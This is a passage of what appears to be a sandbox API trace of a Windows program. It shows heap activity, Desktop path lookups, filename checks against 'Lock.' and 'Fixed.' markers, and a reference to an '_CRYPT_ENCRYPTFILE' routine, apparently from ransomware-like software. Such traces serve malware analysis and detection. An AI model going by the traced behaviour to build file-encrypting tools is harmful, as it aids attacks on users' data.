RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0215.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0215.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0215.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e563a8 [0215.151] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yW8EXq3.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png", lpFilePart=0x8cf650*="yW8EXq3.png") returned 0x23 [0215.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0215.151] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yW8EXq3.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yw8exq3.png")) returned 0xffffffff [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0215.152] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0215.152] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.152] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0215.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0215.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z3NyFrC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3NyFrC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NyFrC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yFrC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FrC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rC6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WxtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xtuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uHo-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ho-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dMOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MOg.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Og.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0215.154] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0215.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x32) returned 0x2e77808 [0215.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z3NyFrC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3NyFrC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NyFrC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yFrC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FrC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rC6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WxtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xtuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uHo-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ho-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dMOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MOg.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Og.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0215.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0215.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0215.157] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0215.157] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.157] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.158] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0215.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0215.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0215.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0215.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0215.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0215.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0215.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0215.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 